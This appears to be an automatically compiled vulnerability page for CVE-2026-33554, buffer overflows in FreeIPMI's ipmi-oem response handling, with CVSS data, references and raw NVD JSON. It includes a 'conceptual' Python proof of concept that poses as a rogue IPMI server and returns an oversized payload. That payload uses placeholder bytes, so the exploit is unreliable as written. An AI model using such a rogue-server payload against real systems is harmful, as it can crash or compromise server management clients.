Security Vulnerability Report
CVE-2026-33554 CVSS 7.5 HIGH

CVE-2026-33554

Published: 2026-03-24 15:16:36
Last Modified: 2026-04-27 19:18:47

Description

ipmi-oem in FreeIPMI before 1.16.17 has exploitable buffer overflows on response messages. The Intelligent Platform Management Interface (IPMI) specification defines a set of interfaces for platform management. It is implemented by a large number of hardware manufacturers to support system management. It is most commonly used for sensor reading (e.g., CPU temperatures through the ipmi-sensors command within FreeIPMI) and remote power control (the ipmipower command). The ipmi-oem client command implements a set of IPMI OEM commands for specific hardware vendors. If a user has supported hardware, they may wish to use the ipmi-oem command to send a request to a server to retrieve specific information. Three subcommands were found to have exploitable buffer overflows on response messages. They are: "ipmi-oem dell get-last-post-code - get the last POST code and string describing the error on some Dell servers," "ipmi-oem supermicro extra-firmware-info - get extra firmware info on Supermicro servers," and "ipmi-oem wistron read-proprietary-string - read a proprietary string on Wistron servers."

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

FreeIPMI < 1.16.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# Conceptual PoC for FreeIPMI ipmi-oem Buffer Overflow
# This script simulates a malicious IPMI server response targeting the vulnerable ipmi-oem commands.
import socket
import struct

IPMI_PORT = 623


def create_malicious_response():
    # Constructing a response packet with an oversized payload to trigger the buffer overflow
    # The specific header and command bytes would depend on the targeted subcommand (e.g., Dell, Supermicro)
    header = b"\x00\x00\x00\x00"  # Dummy Session ID
    target_cmd = b"\x00\x00"  # Example command placeholder
    # Payload size exceeding the buffer limit in FreeIPMI < 1.16.17
    # A large string of 'A's (0x41) to overwrite the return address
    overflow_payload = b"A" * 1024
    return header + target_cmd + overflow_payload


def send_exploit(target_ip):
    # Create the socket before the try block so the finally clause can always close it
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.bind(("0.0.0.0", IPMI_PORT))
        print(f"[*] Listening on port {IPMI_PORT}, waiting for ipmi-oem request from {target_ip}...")
        # Wait for request (simplified)
        data, addr = sock.recvfrom(1024)
        print(f"[*] Received request from {addr}")
        # Send malicious response
        malicious_packet = create_malicious_response()
        sock.sendto(malicious_packet, addr)
        print(f"[*] Malicious response sent to {addr}")
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    # Note: This requires the target machine to initiate a connection to this script
    send_exploit("0.0.0.0")

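References

https://ftp.gnu.org/gnu/freeipmi/
https://savannah.gnu.org/bugs/?68140
https://savannah.gnu.org/bugs/?68141
https://savannah.gnu.org/bugs/?68142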

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33554", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:35.743", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ipmi-oem in FreeIPMI before 1.16.17 has exploitable buffer overflows on response messages. The Intelligent Platform Management Interface (IPMI) specification defines a set of interfaces for platform management. It is implemented by a large number of hardware manufacturers to support system management. It is most commonly used for sensor reading (e.g., CPU temperatures through the ipmi-sensors command within FreeIPMI) and remote power control (the ipmipower command). The ipmi-oem client command implements a set of a IPMI OEM commands for specific hardware vendors. If a user has supported hardware, they may wish to use the ipmi-oem command to send a request to a server to retrieve specific information. Three subcommands were found to have exploitable buffer overflows on response messages. They are: \"ipmi-oem dell get-last-post-code - get the last POST code and string describing the error on some Dell servers,\" \"ipmi-oem supermicro extra-firmware-info - get extra firmware info on Supermicro servers,\" and \"ipmi-oem wistron read-proprietary-string - read a proprietary string on Wistron servers.\""}, {"lang": "es", "value": "ipmi-oem en FreeIPMI anterior a 1.16.17 tiene desbordamientos de búfer explotables en mensajes de respuesta. La especificación de la Interfaz de Gestión de Plataforma Inteligente (IPMI) define un conjunto de interfaces para la gestión de plataformas. Es implementada por un gran número de fabricantes de hardware para soportar la gestión del sistema. Se utiliza más comúnmente para la lectura de sensores (por ejemplo, temperaturas de CPU a través del comando ipmi-sensors dentro de FreeIPMI) y el control remoto de energía (el comando ipmipower). 
El comando cliente ipmi-oem implementa un conjunto de comandos IPMI OEM para proveedores de hardware específicos. Si un usuario tiene hardware compatible, puede desear usar el comando ipmi-oem para enviar una solicitud a un servidor para recuperar información específica. Se encontró que tres subcomandos tenían desbordamientos de búfer explotables en mensajes de respuesta. Son: 'ipmi-oem dell get-last-post-code - obtener el último código POST y la cadena que describe el error en algunos servidores Dell,' 'ipmi-oem supermicro extra-firmware-info - obtener información extra de firmware en servidores Supermicro,' y 'ipmi-oem wistron read-proprietary-string - leer una cadena propietaria en servidores Wistron.'"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://ftp.gnu.org/gnu/freeipmi/", "source": "[email protected]"}, {"url": "https://savannah.gnu.org/bugs/?68140", "source": "[email protected]"}, {"url": "https://savannah.gnu.org/bugs/?68141", "source": "[email protected]"}, {"url": "https://savannah.gnu.org/bugs/?68142", "source": "[email protected]"}]}}